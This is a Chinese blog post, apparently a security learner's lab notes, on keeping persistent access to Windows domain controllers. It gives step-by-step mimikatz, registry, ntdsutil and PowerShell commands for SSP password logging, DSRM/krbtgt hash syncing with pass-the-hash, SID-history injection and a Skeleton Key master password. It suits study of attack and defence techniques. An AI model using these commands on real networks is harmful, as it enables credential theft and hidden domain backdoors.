第141天:内网安全-权限维持&域控后门&SSP&HOOK&DSRM&SID&万能钥匙

于 2024-09-04 15:36:15 发布
阅读量645 收藏 10
点赞数 8
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/141873862
版权

目录

案例一:内网域-权限维持-基于验证 DLL 加载-SSP

案例二:内网域-权限维持-基于机制账号启用-DSRM

案例三:  内网域-权限维持-基于用户属性修改-SID-history

案例四:内网域-权限维持-基于登录进程劫持-Skeleton-Key

案例一:内网域-权限维持-基于验证 DLL 加载-SSP

一共有两种方式,两种方式呢,第一种借助mimikatz,但是重启后会失效,第二种呢借助的是mimikatz种的mimilib.dll文件,但是必须重启才能生效

第一种方式,执行下面的命令

privilege::debug

misc::memssp

执行以后注销,注意不是重启,在c:/windows/system32/mimilsa.log文件种会出现账号密码保存

重启之后再输入不会更新

第二种

经过实验发现移动dll文件必须是x64位的

将mimilib.dll文件移动到c:/windows/system32下

修改注册表重启生效

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
#查看注册表

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
#设置将mimilib导入

powershell中运行

执行完成以后注册表里面会加入对应的值

cs中执行,好像shell就可以执行powershell命令

密码会保存在下面这个文件中

c:\windows\system32\kiwissp.log

真实的环境是建议两种方式一起运行

案例二:内网域-权限维持-基于机制账号启用-DSRM

   利用系统自带机制模式DSRM,修改DSRM默认登录方式和属性,通过其同步krbtgt进行PTH攻击,实现持续化控制,但适用于系统=>windows server2008。每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。

整个操作都是在域控主机上实验

krbtgt用户是Kerberos协议中的一个特殊用户账号,由系统自动生成,用于Kerberos认证过程中的票据签发。

drsm是域还原模式的密码

获取krbtgt的ntml  hash

privilege::debug
lsadump::lsa /patch /name:krbtgt   #获取krbtgt的hash,通过实验发现这里可以用任何用户
token::elevate   #提升权限
lsadump::sam  #保存hash

 dsrm&krbtgt&NTLM hash同步

#进入ntdsutil
ntdsutil
#修改DSRM的密码
set DSRM password
#使DSRM的密码和指定域用户的密码同步 eg:sync from domain account [域用户名]
sync from domain account krbtgt
#退出
按两次q即可退出(第1次:退出DSRM密码设置模式;第2次退出ntdsutil)

要保证密码未过期

 管理员用户的ntlm变成与krbtgt一致了

修改drsm的登录方式,2为允许远程登陆

New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD

利用hash进行攻击

privilege::debug

sekurlsa::pth /domain:owa2010cn-god /user:administrator /ntlm:b097d7ed97495408e1537f706c357fc5

dir \\owa2010cn-god\c$

 读取文件

案例三:  内网域-权限维持-基于用户属性修改-SID-history

这个实验必须在域控中进行

利用命令查看name,sid

shell wmic useraccount get name,sid

sid里面只有后四位有区别,500多是高权限用户,1000多则为普通用户

通过powershell命令获取某一个用户的sid

Import-Module ActiveDirectory
Get-ADUser webadmin -Properties sidhistory

给与webadmin用户admin权限

privilege::debug

sid::patch

sid::add /sam:webadmin /new:administrator

 再次查看会发现多了一个historysid值

webadmin用户就可以成功访问,这里不太清除为什么又要用ip才能够成功

而别的用户无法访问

利用命令查看webadmin时他还是1000多的sid

案例四:内网域-权限维持-基于登录进程劫持-Skeleton-Key

开启万能密码的方式,这个命令时在域控中输入并开启的

privilege::debug

misc::skeleton

正常普通用户利用ipc建立连接

 域控中开启万能密码后(必须使用x64位的mimikatz,才能成功)

这个时候mary用户利用mimikatz建立连接成功 ,这里好像是只能写主机名才可以

net use \\owa2010cn-god\ipc$ "mimikatz" /user:god\administrator

dir访问文件夹

xiaojiesec
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Adjust&DCM:2021联网电视全方位指南.pdf
08-12
CTV 生态系统的复杂性在于其包含多个参与者,包括广告主、需求方平台(DSP)、供应方平台(SSP)和流媒体平台。 如何购买 CTV 广告 购买 CTV 广告需要了解不同的广告格式和定向选择。常见的广告格式包括视频广告、...
SSPX:SSP 扩展-开源
07-08
SSP 的各种扩展:XCAP、XTools、XGUI、XDBPF、XWMS
Window权限维持(七):安全支持提供者1
08-03
### Window权限维持(七):安全支持提供者1 #### 安全支持提供程序(SSP)概述 安全支持提供程序(Security Support Provider, SSP)是Windows操作系统中的一个重要组成部分,主要用于扩展Windows的身份验证机制。...
ExForbidden:在SkyBlock-ExNihilo服务器中最流行的被禁物品中添加各种类似内容,并改善Skyblock中的一些Mod游戏玩法
05-08
禁止的 (适用于minecraft 1.7.10的模块)向SkyBlock-ExNihilo服务器中最流行的违禁物品中添加了各种类似内容,并改进了Skyblock中的一些模块游戏玩法 要求 JDK 1.7 / 1.8 设置 首先,请遵循所有步骤然后克隆此存储...
matlab编写fft函数代码-ssp-matlab:ssp-matlab
06-17
在MATLAB中,快速傅里叶变换(FFT)是一种广泛使用的数字信号处理工具,用于将时域信号转换到频域,以便分析信号的频率成分。MATLAB内置的`fft`函数提供了快速且高效的FFT计算,但有时用户可能出于特定需求或教学...
SSP:学生成功计划 - 开源软件项目
08-04
请参阅 [SSP Wiki Home] ( ) 中的最新文档,如果找不到解决方案,则 [SSP 电子邮件列表] 中的 ssp 电子邮件列表] ( ) 要求 JDK 1.8.X - 仅 JRE 可能还不够,建议使用完整的 JDK Servlet 3.1 容器 - 推荐使用 Tomcat...
Routing-Scheme-for-network-using-Dijkstra-SSP:使用Dijkstra的SSP的网络路由方案
05-12
使用Dijkstra-SSP的网络路由方案使用Dijkstra的SSP的网络路由方案使用斐波那契堆为无向图实现Dijkstra的单一源最短路径(ssp)算法。 为图形使用邻接表表示。 结构与方法: 上一部分的编程已用JAVA编程语言实现。 ...
HideAndSeek:为PocketMine-MP重新创建的捉迷藏游戏
05-01
setseekerspercentage(或ssp):设置将成为寻求者的玩家的百分比 setwaittime(或swt):设置最大玩家的75%加入并开始游戏时的玩家等待时间 setseektime(或sst):设置搜寻者在获胜之前必须找到所有藏身者的时间 ...
burp-ntlm-challenge-decoder:打p扩展以解码NTLM SSP标头并提取domainhost信息
05-19
打p扩展以解码NTLM SSP标头。 通过HTTP的NTLM挑战,我们可以解码有关服务器的有趣信息,例如: 服务器的主机名 服务器的操作系统 服务器的时间戳 域名 域的FQDN 父域名 编译插件 $ gradle build 编译后的插件...
固件-SSP-SINAMICS-DCM-V1-5-SP1-链接地址.txt
最新发布
04-17
根据提供的文件标题、描述、标签以及部分内容,我们可以了解到这是一份关于SINAMICS DCM V1.5 SP1固件的文档链接信息。接下来,我们将深入探讨与这份固件相关的知识点,包括固件的基本概念、SINAMICS DCM V1.5 SP1的...
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 ...Malicious Security Support Provider (SSP) Hook PasswordChangeNotify Skeleton Key DCShadow BadGPO(Group Policy Objects) ACL (Access Control Lists) ACL -AdminSDHolder ACL -DCSync
HS-全球-旅游休闲业-全球旅游与休闲:越过2020-2020.1-126页.pdf
04-08
Ahead、Greggs、GVC Holdings、IHG、JD Wetherspoon、Marston’s、Mitchells&Butlers、National Express、Restaurant Group、Sodexo、SSP Group、Stagecoach、TUI Group、Whitbread和William Hill等。对这些公司的...
东方SSP-1调速器说明书
04-18
### 东方SSP-1调速器操作与安全使用指南 #### 一、产品概述 东方SSP-1调速器是一种专为感应电机设计的速度控制器,能够有效地控制电机的转速,适用于多种工业场景。该调速器通过与特定型号的马达以及电容器配合...
ISC-内网渗透 -最终版.pdf
04-08
- **权限维持**:确保长期存在于目标网络中。 - **信息探测**:持续监控和搜集目标网络中的敏感信息。 ### 七、结论 通过对Active Directory渗透的基础知识、认证方式、远程命令执行技术及内网渗透流程的详细介绍...
CAN-I2S-I2C-SPI-SSP.zip_SSP
09-21
其数据速率通常在几十kHz到几百kHz之间,确保音频信号的高保真传输。 3. **I2C**:由飞利浦(现NXP)开发的I2C是为低速、低功耗应用设计的,广泛应用于传感器、显示设备等。I2C协议使用两根线,一根数据线(SDA)和...
unagi:搜索和下载Hyper Suprime-Cam(HSC)斯巴鲁战略调查(SSP)中的数据
05-02
除了是世界上最美味的鱼的一个, unagi还可以帮助您通过浏览或了Hyper Suprime-CAM(HSC)斯巴鲁战略方案(SSP的,也被称为HSC测量)-使用8.2m斯巴鲁望远镜上的超棒初焦摄像头进行的雄心勃勃的多波段深测光测量。...
SSP-Scheduler-WebApp:一个Web应用程序,可以帮助学生创建具有许多首选项的所需时间表
05-01
SSP调度器 SSP-Scheduler是一个Web应用程序,可以帮助学生立即创建具有许多首选项的所需时间表。 目录 动机 通过开发此应用程序,我们为我们解决了一个大问题,我们在每个学期开始时都花了很多时间来创建时间表,并...
docker-ssp:开源的基于php语言开发的ldap自助修改密码系统自助服务密码
03-23
cd docker-ssp 在本地编辑assets/config.inc.php ,然后再进行合并 docker build -t= " $USER /ssp:1.0 " . 运行: docker run --name sunssp -p 10001:80 -d $USER /ssp:1.0 问题 我们可以在配置文件config.inc....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值